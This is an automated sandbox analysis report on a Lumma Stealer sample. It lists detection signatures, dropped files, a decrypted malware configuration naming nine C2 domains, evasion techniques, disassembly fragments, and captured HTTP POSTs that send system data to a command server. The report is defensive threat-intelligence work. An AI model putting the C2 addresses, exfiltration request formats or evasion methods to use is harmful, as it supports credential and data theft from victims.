Edit tour

Windows Analysis Report
Cph7VEeu1r.exe

Overview

General Information

Sample name:	Cph7VEeu1r.exe renamed because original name is a hash value
Original sample name:	02e25b261f1a228df152eef5977c625c.exe
Analysis ID:	1581230
MD5:	02e25b261f1a228df152eef5977c625c
SHA1:	8a8ad75e8d3a324dbe84f0911793d04eb73bc6ef
SHA256:	620a56b42afe5245088bbe070eab84b2ab6e5baaebb28be61c1cf339c7375006
Tags:	exeuser-abuse_ch
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Hides threads from debuggers

Leaks process information

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

Sample uses string decryption to hide its real strings

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Entry point lies outside standard sections

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

Cph7VEeu1r.exe (PID: 908 cmdline: "C:\Users\user\Desktop\Cph7VEeu1r.exe" MD5: 02E25B261F1A228DF152EEF5977C625C)

LummaC2.exe (PID: 1920 cmdline: "C:\Users\user\AppData\Local\Temp\LummaC2.exe" MD5: 607000C61FCB5A41B8D511B5ED7625D4)

Set-up.exe (PID: 6108 cmdline: "C:\Users\user\AppData\Local\Temp\Set-up.exe" MD5: 2A99036C44C996CEDEB2042D389FE23C)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["wordyfindy.lat", "tentabatte.lat", "bashfulacid.lat", "manyrestro.lat", "censeractersj.click", "shapestickyr.lat", "talkynicer.lat", "curverpluch.lat", "slipperyloo.lat"], "Build id": "Fppr10--Indus2"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.Cph7VEeu1r.exe.8e0000.0.unpack	MALWARE_Win_DLInjector04	Detects downloader / injector	ditekSHen	0x6d30d2:$s1: Runner 0x6d3237:$s3: RunOnStartup 0x6d30e6:$a1: Antis 0x6d3113:$a2: antiVM 0x6d311a:$a3: antiSandbox 0x6d3126:$a4: antiDebug 0x6d3130:$a5: antiEmulator 0x6d313d:$a6: enablePersistence 0x6d314f:$a7: enableFakeError 0x6d3260:$a8: DetectVirtualMachine 0x6d3285:$a9: DetectSandboxie 0x6d32b0:$a10: DetectDebugger 0x6d32bf:$a11: CheckEmulator

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Cph7VEeu1r.exe

Avira: detected

Found malware configuration

Source: 00000002.00000002.2678865014.0000000001189000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: LummaC {"C2 url": ["wordyfindy.lat", "tentabatte.lat", "bashfulacid.lat", "manyrestro.lat", "censeractersj.click", "shapestickyr.lat", "talkynicer.lat", "curverpluch.lat", "slipperyloo.lat"], "Build id": "Fppr10--Indus2"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	ReversingLabs: Detection: 26%

Multi AV Scanner detection for submitted file

Source: Cph7VEeu1r.exe

ReversingLabs: Detection: 57%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Cph7VEeu1r.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000002.00000002.2678865014.0000000001189000.00000004.00000020.00020000.00000000.sdmp	String decryptor: bashfulacid.lat
Source: 00000002.00000002.2678865014.0000000001189000.00000004.00000020.00020000.00000000.sdmp	String decryptor: tentabatte.lat
Source: 00000002.00000002.2678865014.0000000001189000.00000004.00000020.00020000.00000000.sdmp	String decryptor: curverpluch.lat
Source: 00000002.00000002.2678865014.0000000001189000.00000004.00000020.00020000.00000000.sdmp	String decryptor: talkynicer.lat
Source: 00000002.00000002.2678865014.0000000001189000.00000004.00000020.00020000.00000000.sdmp	String decryptor: shapestickyr.lat
Source: 00000002.00000002.2678865014.0000000001189000.00000004.00000020.00020000.00000000.sdmp	String decryptor: manyrestro.lat
Source: 00000002.00000002.2678865014.0000000001189000.00000004.00000020.00020000.00000000.sdmp	String decryptor: slipperyloo.lat
Source: 00000002.00000002.2678865014.0000000001189000.00000004.00000020.00020000.00000000.sdmp	String decryptor: wordyfindy.lat
Source: 00000002.00000002.2678865014.0000000001189000.00000004.00000020.00020000.00000000.sdmp	String decryptor: censeractersj.click
Source: 00000002.00000002.2678865014.0000000001189000.00000004.00000020.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000002.00000002.2678865014.0000000001189000.00000004.00000020.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000002.00000002.2678865014.0000000001189000.00000004.00000020.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000002.00000002.2678865014.0000000001189000.00000004.00000020.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000002.00000002.2678865014.0000000001189000.00000004.00000020.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000002.00000002.2678865014.0000000001189000.00000004.00000020.00020000.00000000.sdmp	String decryptor: Fppr10--Indus2

Source: Cph7VEeu1r.exe, 00000000.00000003.1443586702.00000000077EF000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_7f2a03df-c

Source: Cph7VEeu1r.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov ecx, eax	2_2_0048C59C
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+eax+273D8908h]	2_2_0048EEC0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], 40C3E6E8h	2_2_0048EEC0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+eax+273D8908h]	2_2_0048F040
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], 38B2B0F7h	2_2_0048F040
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov byte ptr [esi], cl	2_2_0047B078
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh	2_2_0048A800
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 06702B10h	2_2_0048A800
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh	2_2_0048A800
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov ecx, eax	2_2_0048A800
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx edx, byte ptr [ebx+eax]	2_2_0048B813
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], AD68FE34h	2_2_0048E8D0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then push esi	2_2_004710F3
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov edx, eax	2_2_00468095
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-6E7BF537h]	2_2_0047C894
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov ecx, eax	2_2_004790B0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-23ABFE5Bh]	2_2_004790B0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then jmp edx	2_2_0048D140
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov ecx, eax	2_2_0046D172
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-6E7BF537h]	2_2_0047C9DA
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-6E7BF537h]	2_2_0047C9E9
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-6E7BF537h]	2_2_0047C984
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov ecx, eax	2_2_0046D189
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+795224EFh]	2_2_004759B0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov word ptr [edx], cx	2_2_00464A50
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov eax, ecx	2_2_00464A50
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov ebp, dword ptr [esp+20h]	2_2_00464A50
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	2_2_00464A50
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	2_2_00464A50
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov esi, edx	2_2_0046720B
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+65F916CFh]	2_2_0046720B
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then and esi, 80000000h	2_2_00458A20
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+795224B5h]	2_2_00476230
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov word ptr [edx], cx	2_2_004692C0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-15B7625Fh]	2_2_00478290
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax+273D8904h]	2_2_0048DAA0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+418B67A0h]	2_2_0045D35C
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 9164D103h	2_2_0048DBB0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	2_2_00457440
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx ecx, word ptr [ebp+edi*4+00h]	2_2_00457440
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx ecx, byte ptr [edi+eax]	2_2_0048B46A
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then cmp word ptr [edi+eax], 0000h	2_2_0046CC60
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov dword ptr [ebp-00000248h], E7E6E5E6h	2_2_0048BC14
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov ecx, eax	2_2_0048BC14
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov esi, eax	2_2_00466D52
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov edi, ecx	2_2_0046D560
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+ebp]	2_2_00487D00
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov word ptr [ebx], cx	2_2_0046AD81
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	2_2_00479DA0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov edx, ecx	2_2_0045EDB4
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov edx, eax	2_2_0045EDB4
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov edi, dword ptr [esp+54h]	2_2_00478640
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov edx, eax	2_2_0048BCDB
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx esi, word ptr [ecx]	2_2_004646C0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov byte ptr [ecx], al	2_2_004766C0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then jmp edx	2_2_004726D3
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov ecx, eax	2_2_0047BF45
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then jmp eax	2_2_00473FF1
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov edi, dword ptr [esp+30h]	2_2_00473FF1
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then cmp dword ptr [esi+ebx*8], 4B1BF3DAh	2_2_00487790
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then push dword ptr [esp+04h]	2_2_00487790

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: wordyfindy.lat
Source: Malware configuration extractor	URLs: tentabatte.lat
Source: Malware configuration extractor	URLs: bashfulacid.lat
Source: Malware configuration extractor	URLs: manyrestro.lat
Source: Malware configuration extractor	URLs: censeractersj.click
Source: Malware configuration extractor	URLs: shapestickyr.lat
Source: Malware configuration extractor	URLs: talkynicer.lat
Source: Malware configuration extractor	URLs: curverpluch.lat
Source: Malware configuration extractor	URLs: slipperyloo.lat

Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: /
Source: global traffic	HTTP traffic detected: POST /nTrmoVgOaovBJpKSuLkP1735210003 HTTP/1.1Host: home.fortth14ht.topAccept: /Content-Type: application/jsonContent-Length: 473466Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 32 38 39 37 34 38 30 38 36 34 33 31 36 35 34 31 31 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 34 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 36 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 32 20 7d 2c
Source: global traffic	HTTP traffic detected: GET /nTrmoVgOaovBJpKSuLkP1735210003?argument=0 HTTP/1.1Host: home.fortth14ht.topAccept: /
Source: global traffic	HTTP traffic detected: POST /nTrmoVgOaovBJpKSuLkP1735210003 HTTP/1.1Host: home.fortth14ht.topAccept: /Content-Type: application/jsonContent-Length: 31Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }

Source: Joe Sandbox View	IP Address: 185.121.15.192 185.121.15.192
Source: Joe Sandbox View	IP Address: 3.218.7.103 3.218.7.103

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: /
Source: global traffic	HTTP traffic detected: GET /nTrmoVgOaovBJpKSuLkP1735210003?argument=0 HTTP/1.1Host: home.fortth14ht.topAccept: /

Source: global traffic	DNS traffic detected: DNS query: httpbin.org
Source: global traffic	DNS traffic detected: DNS query: home.fortth14ht.top

Source: unknown

HTTP traffic detected: POST /nTrmoVgOaovBJpKSuLkP1735210003 HTTP/1.1Host: home.fortth14ht.topAccept: */*Content-Type: application/jsonContent-Length: 473466Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 32 38 39 37 34 38 30 38 36 34 33 31 36 35 34 31 31 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 34 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 36 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 32 20 7d 2c

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Fri, 27 Dec 2024 07:53:24 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
